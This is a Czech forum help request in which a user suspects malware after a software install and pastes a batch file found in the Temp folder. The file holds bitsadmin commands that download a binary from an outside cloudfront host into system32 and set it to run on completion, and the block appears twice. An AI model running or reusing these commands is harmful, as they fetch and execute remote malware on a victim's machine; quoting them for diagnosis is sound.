bitter.exe / bitsadmin.exe
Napsal: 02 dub 2016 15:09
Ahoj stahoval jsem nějaký program, po dokončení instalace vyskočil avast že chce kontrolu po restartu, provedl jsem a našlo to viry, poté co se pc zase zapnul vyskočilo cmd a hned zase zmizelo, Prolezl jsem nějaké složky a našel jsem v C:\Users\Michall\AppData\Local\Temp několik (cca 20) souboru z toho dne přibližně i stejný čas, jsou divně pojmenované ({E638ABC1-0067-474b-A379-87CFE81E7848}) a byl tam i dávkový soubor systému Windows jménem _sti
a je vněm napsáno
C:\Windows\system32\bitsadmin.exe /CANCEL task2
C:\Windows\system32\bitsadmin.exe /CREATE task2
C:\Windows\system32\bitsadmin.exe /SETMINRETRYDELAY task2 3600
C:\Windows\system32\bitsadmin.exe /SETNOTIFYCMDLINE task2 C:\Windows\system32\cmd.exe " /C C:\Windows\system32\bitsadmin.exe /COMPLETE task2 && C:\Windows\system32\bitter.exe /sparam=g41zamobl6629bf,74d13400-0196-49a1-b0ed-c828e740598a, 2>nul"
C:\Windows\system32\bitsadmin.exe /ADDFILE task2 http://dk5gckyelnxjl.cloudfront.net/b.a ... 28e740598a, C:\Windows\system32\bitter.exe
C:\Windows\system32\bitsadmin.exe /RESUME task2
avast hlásí že je vše v pořádku ale já si to nemyslím
Co mám dělat ??
a je vněm napsáno
C:\Windows\system32\bitsadmin.exe /CANCEL task2
C:\Windows\system32\bitsadmin.exe /CREATE task2
C:\Windows\system32\bitsadmin.exe /SETMINRETRYDELAY task2 3600
C:\Windows\system32\bitsadmin.exe /SETNOTIFYCMDLINE task2 C:\Windows\system32\cmd.exe " /C C:\Windows\system32\bitsadmin.exe /COMPLETE task2 && C:\Windows\system32\bitter.exe /sparam=g41zamobl6629bf,74d13400-0196-49a1-b0ed-c828e740598a, 2>nul"
C:\Windows\system32\bitsadmin.exe /ADDFILE task2 http://dk5gckyelnxjl.cloudfront.net/b.a ... 28e740598a, C:\Windows\system32\bitter.exe
C:\Windows\system32\bitsadmin.exe /RESUME task2
avast hlásí že je vše v pořádku ale já si to nemyslím
Co mám dělat ??